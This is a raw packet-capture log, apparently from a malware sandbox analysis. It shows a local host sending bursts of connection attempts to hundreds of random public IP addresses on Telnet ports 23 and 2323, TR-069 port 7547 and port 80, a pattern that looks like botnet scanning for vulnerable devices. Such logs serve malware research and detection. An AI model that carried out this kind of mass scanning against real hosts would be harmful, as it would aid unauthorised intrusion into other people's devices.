                                          Nov 7, 2024 11:57:59.628556013 CET5871223192.168.2.13180.155.178.33
                                          Nov 7, 2024 11:57:59.628833055 CET4988423192.168.2.13106.130.68.178
                                          Nov 7, 2024 11:57:59.629196882 CET356927547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:57:59.630472898 CET4761223192.168.2.1379.132.89.112
                                          Nov 7, 2024 11:57:59.632203102 CET4834223192.168.2.1312.165.34.188
                                          Nov 7, 2024 11:57:59.632505894 CET409647547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:57:59.633641958 CET500122323192.168.2.13174.84.69.60
                                          Nov 7, 2024 11:57:59.635251045 CET5908823192.168.2.13218.34.132.166
                                          Nov 7, 2024 11:57:59.635561943 CET393447547192.168.2.13199.58.155.75
                                          Nov 7, 2024 11:57:59.636805058 CET4488423192.168.2.1397.104.220.6
                                          Nov 7, 2024 11:57:59.637088060 CET234834212.165.34.188192.168.2.13
                                          Nov 7, 2024 11:57:59.637166977 CET4834223192.168.2.1312.165.34.188
                                          Nov 7, 2024 11:57:59.638503075 CET4011623192.168.2.1378.61.85.38
                                          Nov 7, 2024 11:57:59.638870955 CET498747547192.168.2.13167.210.14.28
                                          Nov 7, 2024 11:57:59.639960051 CET4667023192.168.2.13110.39.148.250
                                          Nov 7, 2024 11:57:59.641697884 CET5428623192.168.2.13178.143.17.96
                                          Nov 7, 2024 11:57:59.642110109 CET398867547192.168.2.13216.224.7.248
                                          Nov 7, 2024 11:57:59.643294096 CET4016823192.168.2.13198.163.211.242
                                          Nov 7, 2024 11:57:59.645039082 CET5281023192.168.2.1370.248.64.207
                                          Nov 7, 2024 11:57:59.645442009 CET467247547192.168.2.1346.158.79.209
                                          Nov 7, 2024 11:57:59.646400928 CET486002323192.168.2.1396.163.172.32
                                          Nov 7, 2024 11:57:59.648049116 CET3400623192.168.2.13223.150.241.220
                                          Nov 7, 2024 11:57:59.648382902 CET492507547192.168.2.13193.23.8.185
                                          Nov 7, 2024 11:57:59.649530888 CET3362623192.168.2.1377.38.54.150
                                          Nov 7, 2024 11:57:59.649930000 CET235281070.248.64.207192.168.2.13
                                          Nov 7, 2024 11:57:59.650069952 CET5281023192.168.2.1370.248.64.207
                                          Nov 7, 2024 11:57:59.651550055 CET438947547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:57:59.655256033 CET542207547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:57:59.656428099 CET75474389423.91.39.87192.168.2.13
                                          Nov 7, 2024 11:57:59.656472921 CET438947547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:57:59.657726049 CET5310423192.168.2.1371.234.3.59
                                          Nov 7, 2024 11:57:59.658458948 CET441887547192.168.2.13170.242.186.244
                                          Nov 7, 2024 11:57:59.659532070 CET5266023192.168.2.13152.55.102.238
                                          Nov 7, 2024 11:57:59.660984039 CET3630623192.168.2.13142.121.147.161
                                          Nov 7, 2024 11:57:59.661663055 CET524147547192.168.2.13110.211.19.120
                                          Nov 7, 2024 11:57:59.662606955 CET5172623192.168.2.1366.163.190.7
                                          Nov 7, 2024 11:57:59.664113045 CET4600223192.168.2.13131.37.133.39
                                          Nov 7, 2024 11:57:59.664747953 CET376127547192.168.2.1382.217.130.144
                                          Nov 7, 2024 11:57:59.665745974 CET3766423192.168.2.13211.203.171.23
                                          Nov 7, 2024 11:57:59.667488098 CET589402323192.168.2.13155.130.102.8
                                          Nov 7, 2024 11:57:59.668096066 CET402147547192.168.2.1361.64.58.161
                                          Nov 7, 2024 11:57:59.668904066 CET2346002131.37.133.39192.168.2.13
                                          Nov 7, 2024 11:57:59.668991089 CET4600223192.168.2.13131.37.133.39
                                          Nov 7, 2024 11:57:59.669034958 CET4531623192.168.2.13138.105.105.159
                                          Nov 7, 2024 11:57:59.670380116 CET3352223192.168.2.13129.3.14.255
                                          Nov 7, 2024 11:57:59.671061039 CET593627547192.168.2.13200.216.17.231
                                          Nov 7, 2024 11:57:59.672013998 CET3837023192.168.2.13163.40.20.142
                                          Nov 7, 2024 11:57:59.673407078 CET5181023192.168.2.1353.95.188.14
                                          Nov 7, 2024 11:57:59.674051046 CET456787547192.168.2.13188.192.33.17
                                          Nov 7, 2024 11:57:59.674942017 CET4123623192.168.2.1389.153.207.175
                                          Nov 7, 2024 11:57:59.676378965 CET4347023192.168.2.13124.225.211.33
                                          Nov 7, 2024 11:57:59.676831961 CET2338370163.40.20.142192.168.2.13
                                          Nov 7, 2024 11:57:59.676888943 CET3837023192.168.2.13163.40.20.142
                                          Nov 7, 2024 11:57:59.677054882 CET574767547192.168.2.1388.52.144.208
                                          Nov 7, 2024 11:57:59.678054094 CET5444023192.168.2.1395.75.253.253
                                          Nov 7, 2024 11:57:59.679419994 CET5288023192.168.2.1323.121.174.92
                                          Nov 7, 2024 11:57:59.680125952 CET348547547192.168.2.1343.168.39.9
                                          Nov 7, 2024 11:57:59.681083918 CET4514423192.168.2.1350.22.151.61
                                          Nov 7, 2024 11:57:59.682346106 CET4309023192.168.2.13186.198.250.34
                                          Nov 7, 2024 11:57:59.682996988 CET366027547192.168.2.1344.213.15.85
                                          Nov 7, 2024 11:57:59.683948040 CET4768823192.168.2.132.168.80.181
                                          Nov 7, 2024 11:57:59.685210943 CET4009823192.168.2.131.198.187.4
                                          Nov 7, 2024 11:57:59.685847044 CET533047547192.168.2.13143.249.137.26
                                          Nov 7, 2024 11:57:59.686979055 CET4068823192.168.2.13166.172.109.29
                                          Nov 7, 2024 11:57:59.688409090 CET448402323192.168.2.13102.61.117.64
                                          Nov 7, 2024 11:57:59.688774109 CET23476882.168.80.181192.168.2.13
                                          Nov 7, 2024 11:57:59.688833952 CET4768823192.168.2.132.168.80.181
                                          Nov 7, 2024 11:57:59.688992977 CET510167547192.168.2.13143.242.231.169
                                          Nov 7, 2024 11:57:59.690113068 CET4654823192.168.2.13138.136.132.124
                                          Nov 7, 2024 11:57:59.691804886 CET3806623192.168.2.13110.218.241.154
                                          Nov 7, 2024 11:57:59.692473888 CET449927547192.168.2.13144.182.249.102
                                          Nov 7, 2024 11:57:59.693490982 CET3551023192.168.2.1373.123.25.202
                                          Nov 7, 2024 11:57:59.694880962 CET4770023192.168.2.135.185.3.170
                                          Nov 7, 2024 11:57:59.695496082 CET553207547192.168.2.1346.229.152.199
                                          Nov 7, 2024 11:57:59.696469069 CET5745223192.168.2.1391.98.200.129
                                          Nov 7, 2024 11:57:59.696716070 CET2338066110.218.241.154192.168.2.13
                                          Nov 7, 2024 11:57:59.696765900 CET3806623192.168.2.13110.218.241.154
                                          Nov 7, 2024 11:57:59.697978973 CET5213023192.168.2.13179.204.124.183
                                          Nov 7, 2024 11:57:59.698661089 CET519167547192.168.2.1375.183.209.41
                                          Nov 7, 2024 11:57:59.699727058 CET389042323192.168.2.13176.133.64.66
                                          Nov 7, 2024 11:57:59.701215982 CET3434023192.168.2.1368.27.161.2
                                          Nov 7, 2024 11:57:59.701776981 CET555727547192.168.2.13135.130.179.126
                                          Nov 7, 2024 11:57:59.702812910 CET3464423192.168.2.13116.96.35.22
                                          Nov 7, 2024 11:57:59.704189062 CET4812223192.168.2.1372.215.189.23
                                          Nov 7, 2024 11:57:59.704899073 CET401507547192.168.2.13159.248.124.230
                                          Nov 7, 2024 11:57:59.705846071 CET5961423192.168.2.13145.145.81.5
                                          Nov 7, 2024 11:57:59.707246065 CET5820423192.168.2.1398.108.52.182
                                          Nov 7, 2024 11:57:59.707901001 CET483007547192.168.2.13163.7.213.125
                                          Nov 7, 2024 11:57:59.708770990 CET4256823192.168.2.13109.42.181.206
                                          Nov 7, 2024 11:57:59.709026098 CET234812272.215.189.23192.168.2.13
                                          Nov 7, 2024 11:57:59.709106922 CET4812223192.168.2.1372.215.189.23
                                          Nov 7, 2024 11:57:59.710356951 CET5543023192.168.2.13181.143.145.183
                                          Nov 7, 2024 11:57:59.711016893 CET553767547192.168.2.1389.88.8.86
                                          Nov 7, 2024 11:57:59.712138891 CET5351223192.168.2.13141.71.122.189
                                          Nov 7, 2024 11:57:59.714711905 CET4663423192.168.2.1341.198.39.179
                                          Nov 7, 2024 11:57:59.715826988 CET475987547192.168.2.1387.74.210.177
                                          Nov 7, 2024 11:57:59.717039108 CET2353512141.71.122.189192.168.2.13
                                          Nov 7, 2024 11:57:59.717092037 CET5351223192.168.2.13141.71.122.189
                                          Nov 7, 2024 11:57:59.717557907 CET398662323192.168.2.1334.59.58.112
                                          Nov 7, 2024 11:57:59.719172001 CET3416623192.168.2.13143.44.21.74
                                          Nov 7, 2024 11:57:59.719795942 CET592567547192.168.2.13220.47.31.232
                                          Nov 7, 2024 11:57:59.720803976 CET4079423192.168.2.1396.169.164.205
                                          Nov 7, 2024 11:57:59.722071886 CET348082323192.168.2.13163.126.157.42
                                          Nov 7, 2024 11:57:59.722651958 CET351627547192.168.2.13164.67.111.183
                                          Nov 7, 2024 11:57:59.725914955 CET368407547192.168.2.1371.254.190.14
                                          Nov 7, 2024 11:57:59.728900909 CET588207547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:57:59.730108976 CET422627547192.168.2.13183.59.129.150
                                          Nov 7, 2024 11:57:59.730761051 CET75473684071.254.190.14192.168.2.13
                                          Nov 7, 2024 11:57:59.730814934 CET368407547192.168.2.1371.254.190.14
                                          Nov 7, 2024 11:57:59.731017113 CET509767547192.168.2.13157.4.219.114
                                          Nov 7, 2024 11:57:59.732028961 CET448327547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:57:59.733051062 CET368747547192.168.2.1354.8.114.143
                                          Nov 7, 2024 11:57:59.734491110 CET575107547192.168.2.13111.181.107.200
                                          Nov 7, 2024 11:57:59.735388041 CET441907547192.168.2.13151.92.176.195
                                          Nov 7, 2024 11:57:59.736574888 CET455707547192.168.2.1363.214.81.242
                                          Nov 7, 2024 11:57:59.737061977 CET754744832217.63.48.206192.168.2.13
                                          Nov 7, 2024 11:57:59.737112045 CET448327547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:57:59.737675905 CET589427547192.168.2.13170.246.41.239
                                          Nov 7, 2024 11:57:59.738744020 CET340687547192.168.2.1360.50.40.24
                                          Nov 7, 2024 11:57:59.739849091 CET427467547192.168.2.13200.220.184.47
                                          Nov 7, 2024 11:57:59.741214037 CET338507547192.168.2.13119.15.235.117
                                          Nov 7, 2024 11:57:59.742197990 CET447007547192.168.2.13207.191.93.18
                                          Nov 7, 2024 11:57:59.743377924 CET430627547192.168.2.13113.16.91.104
                                          Nov 7, 2024 11:57:59.744318008 CET550687547192.168.2.13173.94.159.118
                                          Nov 7, 2024 11:57:59.744966030 CET595987547192.168.2.13168.30.180.55
                                          Nov 7, 2024 11:57:59.744966030 CET595987547192.168.2.13168.30.180.55
                                          Nov 7, 2024 11:57:59.745430946 CET599447547192.168.2.13168.30.180.55
                                          Nov 7, 2024 11:57:59.746006012 CET558047547192.168.2.13198.219.183.55
                                          Nov 7, 2024 11:57:59.746006012 CET558047547192.168.2.13198.219.183.55
                                          Nov 7, 2024 11:57:59.746436119 CET561487547192.168.2.13198.219.183.55
                                          Nov 7, 2024 11:57:59.747034073 CET373007547192.168.2.13165.239.16.148
                                          Nov 7, 2024 11:57:59.747034073 CET373007547192.168.2.13165.239.16.148
                                          Nov 7, 2024 11:57:59.747524977 CET376427547192.168.2.13165.239.16.148
                                          Nov 7, 2024 11:57:59.748120070 CET361567547192.168.2.13203.84.99.53
                                          Nov 7, 2024 11:57:59.748120070 CET361567547192.168.2.13203.84.99.53
                                          Nov 7, 2024 11:57:59.748228073 CET754743062113.16.91.104192.168.2.13
                                          Nov 7, 2024 11:57:59.748344898 CET430627547192.168.2.13113.16.91.104
                                          Nov 7, 2024 11:57:59.748578072 CET364967547192.168.2.13203.84.99.53
                                          Nov 7, 2024 11:57:59.749089956 CET592507547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:57:59.749089956 CET592507547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:57:59.749631882 CET595887547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:57:59.749780893 CET754759598168.30.180.55192.168.2.13
                                          Nov 7, 2024 11:57:59.750176907 CET532287547192.168.2.13173.66.213.27
                                          Nov 7, 2024 11:57:59.750176907 CET532287547192.168.2.13173.66.213.27
                                          Nov 7, 2024 11:57:59.750780106 CET535647547192.168.2.13173.66.213.27
                                          Nov 7, 2024 11:57:59.750825882 CET754755804198.219.183.55192.168.2.13
                                          Nov 7, 2024 11:57:59.751390934 CET379667547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:59.751390934 CET379667547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:59.751833916 CET754737300165.239.16.148192.168.2.13
                                          Nov 7, 2024 11:57:59.751995087 CET383007547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:59.752525091 CET515267547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:57:59.752525091 CET515267547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:57:59.752866030 CET517887547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:57:59.752888918 CET754736156203.84.99.53192.168.2.13
                                          Nov 7, 2024 11:57:59.753463984 CET520307547192.168.2.134.230.209.133
                                          Nov 7, 2024 11:57:59.753463984 CET520307547192.168.2.134.230.209.133
                                          Nov 7, 2024 11:57:59.753860950 CET75475925045.38.44.1192.168.2.13
                                          Nov 7, 2024 11:57:59.753930092 CET522887547192.168.2.134.230.209.133
                                          Nov 7, 2024 11:57:59.754573107 CET451547547192.168.2.13201.250.120.24
                                          Nov 7, 2024 11:57:59.754573107 CET451547547192.168.2.13201.250.120.24
                                          Nov 7, 2024 11:57:59.754954100 CET454087547192.168.2.13201.250.120.24
                                          Nov 7, 2024 11:57:59.754997969 CET754753228173.66.213.27192.168.2.13
                                          Nov 7, 2024 11:57:59.755553961 CET362267547192.168.2.13217.144.32.43
                                          Nov 7, 2024 11:57:59.755553961 CET362267547192.168.2.13217.144.32.43
                                          Nov 7, 2024 11:57:59.756021023 CET364767547192.168.2.13217.144.32.43
                                          Nov 7, 2024 11:57:59.756334066 CET754737966178.51.106.237192.168.2.13
                                          Nov 7, 2024 11:57:59.756599903 CET597167547192.168.2.1334.183.63.81
                                          Nov 7, 2024 11:57:59.756599903 CET597167547192.168.2.1334.183.63.81
                                          Nov 7, 2024 11:57:59.756813049 CET754738300178.51.106.237192.168.2.13
                                          Nov 7, 2024 11:57:59.756855965 CET383007547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:59.757046938 CET599627547192.168.2.1334.183.63.81
                                          Nov 7, 2024 11:57:59.757319927 CET75475152695.178.151.109192.168.2.13
                                          Nov 7, 2024 11:57:59.757625103 CET438947547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:57:59.757625103 CET438947547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:57:59.758090973 CET440787547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:57:59.758217096 CET7547520304.230.209.133192.168.2.13
                                          Nov 7, 2024 11:57:59.758657932 CET368407547192.168.2.1371.254.190.14
                                          Nov 7, 2024 11:57:59.758657932 CET368407547192.168.2.1371.254.190.14
                                          Nov 7, 2024 11:57:59.759025097 CET368987547192.168.2.1371.254.190.14
                                          Nov 7, 2024 11:57:59.759351969 CET754745154201.250.120.24192.168.2.13
                                          Nov 7, 2024 11:57:59.759551048 CET448327547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:57:59.759551048 CET448327547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:57:59.759994984 CET448847547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:57:59.760384083 CET754736226217.144.32.43192.168.2.13
                                          Nov 7, 2024 11:57:59.760569096 CET383007547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:59.760569096 CET383007547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:59.760607958 CET430627547192.168.2.13113.16.91.104
                                          Nov 7, 2024 11:57:59.760607958 CET430627547192.168.2.13113.16.91.104
                                          Nov 7, 2024 11:57:59.761006117 CET430967547192.168.2.13113.16.91.104
                                          Nov 7, 2024 11:57:59.761379957 CET75475971634.183.63.81192.168.2.13
                                          Nov 7, 2024 11:57:59.762428045 CET75474389423.91.39.87192.168.2.13
                                          Nov 7, 2024 11:57:59.763492107 CET75473684071.254.190.14192.168.2.13
                                          Nov 7, 2024 11:57:59.764471054 CET754744832217.63.48.206192.168.2.13
                                          Nov 7, 2024 11:57:59.765367985 CET754738300178.51.106.237192.168.2.13
                                          Nov 7, 2024 11:57:59.765413046 CET754743062113.16.91.104192.168.2.13
                                          Nov 7, 2024 11:57:59.792385101 CET754737300165.239.16.148192.168.2.13
                                          Nov 7, 2024 11:57:59.792395115 CET754755804198.219.183.55192.168.2.13
                                          Nov 7, 2024 11:57:59.792404890 CET754759598168.30.180.55192.168.2.13
                                          Nov 7, 2024 11:57:59.796334028 CET75475925045.38.44.1192.168.2.13
                                          Nov 7, 2024 11:57:59.796344995 CET754736156203.84.99.53192.168.2.13
                                          Nov 7, 2024 11:57:59.796354055 CET754753228173.66.213.27192.168.2.13
                                          Nov 7, 2024 11:57:59.804383039 CET754745154201.250.120.24192.168.2.13
                                          Nov 7, 2024 11:57:59.804425001 CET7547520304.230.209.133192.168.2.13
                                          Nov 7, 2024 11:57:59.804435015 CET75475152695.178.151.109192.168.2.13
                                          Nov 7, 2024 11:57:59.804488897 CET754737966178.51.106.237192.168.2.13
                                          Nov 7, 2024 11:57:59.804498911 CET75473684071.254.190.14192.168.2.13
                                          Nov 7, 2024 11:57:59.804508924 CET75474389423.91.39.87192.168.2.13
                                          Nov 7, 2024 11:57:59.804518938 CET75475971634.183.63.81192.168.2.13
                                          Nov 7, 2024 11:57:59.804522991 CET754736226217.144.32.43192.168.2.13
                                          Nov 7, 2024 11:57:59.812402964 CET754743062113.16.91.104192.168.2.13
                                          Nov 7, 2024 11:57:59.812413931 CET754738300178.51.106.237192.168.2.13
                                          Nov 7, 2024 11:57:59.812422991 CET754744832217.63.48.206192.168.2.13
                                          Nov 7, 2024 11:57:59.969383955 CET75475925045.38.44.1192.168.2.13
                                          Nov 7, 2024 11:57:59.969455004 CET592507547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:57:59.981894016 CET2358952128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:57:59.982032061 CET5895223192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:57:59.983124018 CET5924423192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:57:59.986974001 CET2358952128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:57:59.988014936 CET2359244128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:57:59.988122940 CET5924423192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:58:00.035022974 CET233678492.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:00.035140991 CET3678423192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:00.035583019 CET3716823192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:00.040004015 CET233678492.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:00.040366888 CET233716892.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:00.040446997 CET3716823192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:00.077938080 CET234479060.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:00.078016996 CET4479023192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:00.078767061 CET4515823192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:00.082798004 CET234479060.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:00.083561897 CET234515860.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:00.083642006 CET4515823192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:00.233341932 CET75475152695.178.151.109192.168.2.13
                                          Nov 7, 2024 11:58:00.233412027 CET515267547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:58:00.398180962 CET254480192.168.2.13112.114.211.99
                                          Nov 7, 2024 11:58:00.398197889 CET254480192.168.2.13112.196.115.69
                                          Nov 7, 2024 11:58:00.398200989 CET254480192.168.2.13112.154.178.250
                                          Nov 7, 2024 11:58:00.398200989 CET254480192.168.2.13112.69.147.112
                                          Nov 7, 2024 11:58:00.398200989 CET254480192.168.2.13112.146.81.189
                                          Nov 7, 2024 11:58:00.398200989 CET254480192.168.2.13112.79.142.149
                                          Nov 7, 2024 11:58:00.398201942 CET254480192.168.2.13112.192.42.89
                                          Nov 7, 2024 11:58:00.398210049 CET254480192.168.2.13112.255.117.3
                                          Nov 7, 2024 11:58:00.398219109 CET254480192.168.2.13112.170.138.218
                                          Nov 7, 2024 11:58:00.398221970 CET254480192.168.2.13112.57.86.217
                                          Nov 7, 2024 11:58:00.398226976 CET254480192.168.2.13112.106.192.86
                                          Nov 7, 2024 11:58:00.398226976 CET254480192.168.2.13112.10.98.127
                                          Nov 7, 2024 11:58:00.398246050 CET254480192.168.2.13112.160.184.113
                                          Nov 7, 2024 11:58:00.398248911 CET254480192.168.2.13112.62.184.59
                                          Nov 7, 2024 11:58:00.398250103 CET254480192.168.2.13112.165.80.160
                                          Nov 7, 2024 11:58:00.398256063 CET254480192.168.2.13112.37.140.0
                                          Nov 7, 2024 11:58:00.398256063 CET254480192.168.2.13112.218.24.87
                                          Nov 7, 2024 11:58:00.398258924 CET254480192.168.2.13112.250.63.145
                                          Nov 7, 2024 11:58:00.398258924 CET254480192.168.2.13112.101.157.143
                                          Nov 7, 2024 11:58:00.398260117 CET254480192.168.2.13112.182.249.18
                                          Nov 7, 2024 11:58:00.398262024 CET254480192.168.2.13112.76.5.208
                                          Nov 7, 2024 11:58:00.398264885 CET254480192.168.2.13112.146.72.23
                                          Nov 7, 2024 11:58:00.398264885 CET254480192.168.2.13112.172.172.1
                                          Nov 7, 2024 11:58:00.398272038 CET254480192.168.2.13112.247.95.114
                                          Nov 7, 2024 11:58:00.398278952 CET254480192.168.2.13112.15.198.120
                                          Nov 7, 2024 11:58:00.398278952 CET254480192.168.2.13112.10.142.29
                                          Nov 7, 2024 11:58:00.398293018 CET254480192.168.2.13112.8.205.244
                                          Nov 7, 2024 11:58:00.398293972 CET254480192.168.2.13112.9.139.215
                                          Nov 7, 2024 11:58:00.398294926 CET254480192.168.2.13112.236.38.112
                                          Nov 7, 2024 11:58:00.398294926 CET254480192.168.2.13112.213.243.19
                                          Nov 7, 2024 11:58:00.398294926 CET254480192.168.2.13112.86.194.231
                                          Nov 7, 2024 11:58:00.398304939 CET254480192.168.2.13112.101.180.235
                                          Nov 7, 2024 11:58:00.398310900 CET254480192.168.2.13112.183.71.10
                                          Nov 7, 2024 11:58:00.398315907 CET254480192.168.2.13112.147.250.148
                                          Nov 7, 2024 11:58:00.398317099 CET254480192.168.2.13112.163.240.222
                                          Nov 7, 2024 11:58:00.398317099 CET254480192.168.2.13112.83.245.232
                                          Nov 7, 2024 11:58:00.398317099 CET254480192.168.2.13112.40.83.0
                                          Nov 7, 2024 11:58:00.398327112 CET254480192.168.2.13112.210.102.92
                                          Nov 7, 2024 11:58:00.398327112 CET254480192.168.2.13112.8.158.9
                                          Nov 7, 2024 11:58:00.398330927 CET254480192.168.2.13112.167.112.164
                                          Nov 7, 2024 11:58:00.398339033 CET254480192.168.2.13112.243.149.217
                                          Nov 7, 2024 11:58:00.398339033 CET254480192.168.2.13112.122.96.85
                                          Nov 7, 2024 11:58:00.398344040 CET254480192.168.2.13112.178.200.174
                                          Nov 7, 2024 11:58:00.398344040 CET254480192.168.2.13112.149.98.11
                                          Nov 7, 2024 11:58:00.398350000 CET254480192.168.2.13112.114.206.121
                                          Nov 7, 2024 11:58:00.398355961 CET254480192.168.2.13112.239.214.219
                                          Nov 7, 2024 11:58:00.398355961 CET254480192.168.2.13112.104.108.156
                                          Nov 7, 2024 11:58:00.398363113 CET254480192.168.2.13112.98.180.58
                                          Nov 7, 2024 11:58:00.398382902 CET254480192.168.2.13112.188.91.200
                                          Nov 7, 2024 11:58:00.398391008 CET254480192.168.2.13112.241.239.178
                                          Nov 7, 2024 11:58:00.398391962 CET254480192.168.2.13112.109.182.149
                                          Nov 7, 2024 11:58:00.398391962 CET254480192.168.2.13112.187.222.219
                                          Nov 7, 2024 11:58:00.398391962 CET254480192.168.2.13112.60.215.192
                                          Nov 7, 2024 11:58:00.398401976 CET254480192.168.2.13112.73.190.135
                                          Nov 7, 2024 11:58:00.398402929 CET254480192.168.2.13112.59.195.15
                                          Nov 7, 2024 11:58:00.398406982 CET254480192.168.2.13112.190.131.72
                                          Nov 7, 2024 11:58:00.398406982 CET254480192.168.2.13112.22.69.217
                                          Nov 7, 2024 11:58:00.398420095 CET254480192.168.2.13112.38.234.232
                                          Nov 7, 2024 11:58:00.398425102 CET254480192.168.2.13112.6.47.177
                                          Nov 7, 2024 11:58:00.398431063 CET254480192.168.2.13112.112.214.186
                                          Nov 7, 2024 11:58:00.398432970 CET254480192.168.2.13112.159.194.41
                                          Nov 7, 2024 11:58:00.398435116 CET254480192.168.2.13112.86.195.240
                                          Nov 7, 2024 11:58:00.398435116 CET254480192.168.2.13112.90.252.24
                                          Nov 7, 2024 11:58:00.398436069 CET254480192.168.2.13112.112.211.88
                                          Nov 7, 2024 11:58:00.398436069 CET254480192.168.2.13112.84.214.83
                                          Nov 7, 2024 11:58:00.398436069 CET254480192.168.2.13112.148.88.68
                                          Nov 7, 2024 11:58:00.398438931 CET254480192.168.2.13112.85.162.36
                                          Nov 7, 2024 11:58:00.398438931 CET254480192.168.2.13112.164.101.90
                                          Nov 7, 2024 11:58:00.398447037 CET254480192.168.2.13112.38.68.81
                                          Nov 7, 2024 11:58:00.398454905 CET254480192.168.2.13112.125.55.59
                                          Nov 7, 2024 11:58:00.398459911 CET254480192.168.2.13112.7.82.87
                                          Nov 7, 2024 11:58:00.398464918 CET254480192.168.2.13112.254.81.13
                                          Nov 7, 2024 11:58:00.398472071 CET254480192.168.2.13112.236.142.244
                                          Nov 7, 2024 11:58:00.398472071 CET254480192.168.2.13112.168.46.8
                                          Nov 7, 2024 11:58:00.398473978 CET254480192.168.2.13112.111.171.207
                                          Nov 7, 2024 11:58:00.398483038 CET254480192.168.2.13112.131.165.71
                                          Nov 7, 2024 11:58:00.398484945 CET254480192.168.2.13112.15.4.249
                                          Nov 7, 2024 11:58:00.398484945 CET254480192.168.2.13112.45.251.4
                                          Nov 7, 2024 11:58:00.398489952 CET254480192.168.2.13112.77.155.131
                                          Nov 7, 2024 11:58:00.398489952 CET254480192.168.2.13112.33.204.123
                                          Nov 7, 2024 11:58:00.398489952 CET254480192.168.2.13112.10.168.13
                                          Nov 7, 2024 11:58:00.398497105 CET254480192.168.2.13112.126.25.156
                                          Nov 7, 2024 11:58:00.398499012 CET254480192.168.2.13112.225.249.2
                                          Nov 7, 2024 11:58:00.398504019 CET254480192.168.2.13112.250.7.76
                                          Nov 7, 2024 11:58:00.398513079 CET254480192.168.2.13112.189.116.216
                                          Nov 7, 2024 11:58:00.398513079 CET254480192.168.2.13112.26.149.157
                                          Nov 7, 2024 11:58:00.398533106 CET254480192.168.2.13112.35.130.136
                                          Nov 7, 2024 11:58:00.398538113 CET254480192.168.2.13112.189.58.195
                                          Nov 7, 2024 11:58:00.398539066 CET254480192.168.2.13112.234.209.41
                                          Nov 7, 2024 11:58:00.398539066 CET254480192.168.2.13112.180.118.178
                                          Nov 7, 2024 11:58:00.398540020 CET254480192.168.2.13112.119.24.176
                                          Nov 7, 2024 11:58:00.398546934 CET254480192.168.2.13112.118.217.206
                                          Nov 7, 2024 11:58:00.398550034 CET254480192.168.2.13112.172.197.155
                                          Nov 7, 2024 11:58:00.398550034 CET254480192.168.2.13112.25.128.122
                                          Nov 7, 2024 11:58:00.398555040 CET254480192.168.2.13112.159.72.95
                                          Nov 7, 2024 11:58:00.398560047 CET254480192.168.2.13112.239.193.86
                                          Nov 7, 2024 11:58:00.398561001 CET254480192.168.2.13112.234.207.104
                                          Nov 7, 2024 11:58:00.398561001 CET254480192.168.2.13112.238.40.151
                                          Nov 7, 2024 11:58:00.398561001 CET254480192.168.2.13112.200.78.228
                                          Nov 7, 2024 11:58:00.398565054 CET254480192.168.2.13112.174.103.15
                                          Nov 7, 2024 11:58:00.398571014 CET254480192.168.2.13112.73.92.251
                                          Nov 7, 2024 11:58:00.398571968 CET254480192.168.2.13112.97.28.176
                                          Nov 7, 2024 11:58:00.398578882 CET254480192.168.2.13112.66.29.16
                                          Nov 7, 2024 11:58:00.398581028 CET254480192.168.2.13112.208.161.120
                                          Nov 7, 2024 11:58:00.398580074 CET254480192.168.2.13112.198.107.54
                                          Nov 7, 2024 11:58:00.398581028 CET254480192.168.2.13112.47.124.15
                                          Nov 7, 2024 11:58:00.398581982 CET254480192.168.2.13112.114.19.102
                                          Nov 7, 2024 11:58:00.398581028 CET254480192.168.2.13112.135.127.68
                                          Nov 7, 2024 11:58:00.398580074 CET254480192.168.2.13112.61.235.248
                                          Nov 7, 2024 11:58:00.398590088 CET254480192.168.2.13112.183.133.106
                                          Nov 7, 2024 11:58:00.398592949 CET254480192.168.2.13112.179.64.130
                                          Nov 7, 2024 11:58:00.398602009 CET254480192.168.2.13112.85.111.101
                                          Nov 7, 2024 11:58:00.398602009 CET254480192.168.2.13112.248.40.16
                                          Nov 7, 2024 11:58:00.398603916 CET254480192.168.2.13112.78.24.170
                                          Nov 7, 2024 11:58:00.398602009 CET254480192.168.2.13112.93.196.246
                                          Nov 7, 2024 11:58:00.398621082 CET254480192.168.2.13112.40.254.168
                                          Nov 7, 2024 11:58:00.398623943 CET254480192.168.2.13112.162.58.242
